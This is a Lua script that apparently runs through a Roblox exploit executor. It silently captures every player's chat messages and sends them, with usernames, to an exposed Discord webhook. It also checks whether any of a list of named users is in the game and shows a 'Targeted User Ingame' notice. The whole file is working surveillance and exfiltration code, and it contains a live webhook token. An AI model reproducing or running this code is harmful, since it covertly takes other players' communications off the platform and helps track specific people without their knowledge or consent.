wait(10)
local wh = 'https://discord.com/api/webhooks/835936411068792854/WPDTUWNYkxaiAs9mCq1CkCeYk4MscfAiypcYfMh-ByPQ3HlgxMMMOEof0f_GG1VplVeQ'


local embed1 = {
       ['title'] = 'Beginning of Message logs on '..game.PlaceId.." at "..tostring(os.date("%m/%d/%y"))
   }
local a = syn.request({
   Url = wh,
   Headers = {['Content-Type'] = 'application/json'},
   Body = game:GetService("HttpService"):JSONEncode({['embeds'] = {embed1}, ['content'] = ''}),
   Method = "POST"
})
function logMsg(Webhook, Player, Message)
   local embed = {
       ['description'] = Player..": "..Message
   }
   local a = syn.request({
       Url = Webhook,
       Headers = {['Content-Type'] = 'application/json'},
       Body = game:GetService("HttpService"):JSONEncode({['embeds'] = {embed}, ['content'] = ''}),
       Method = "POST"
   })
end
for i,v in pairs(game.Players:GetPlayers()) do
   v.Chatted:Connect(function(msg)
       logMsg(wh, v.Name, msg)
   end)
end

game.Players.PlayerAdded:Connect(function(plr)
   plr.Chatted:Connect(function(msg)
       logMsg(wh, plr.Name, msg)
   end)
   end)


local players = game:GetService('Players')
local white_list = { "Cyber352784", "NuttellaStar", "xCudo", "TheDutchSoul", "xXAbductedbyaliensXx", "iiiX_Blessed", "GhostlyPresence1311", "vSebyy", "NutsCyber3527", "TheSessizER123", "1Lunacy" }

for _,plr in pairs(players:GetPlayers()) do 
    if table.find(white_list,plr.Name) then 
        game.StarterGui:SetCore("SendNotification", {Title = "Warn system",Text = "Targeted User Ingame",Icon = "rbxassetid://57254792",Duration = 10})
    else 
        game.StarterGui:SetCore("SendNotification", {Title = "Warn system",Text = "User Not Here",Icon = "rbxassetid://57254792",Duration = 10})
    end 
end 

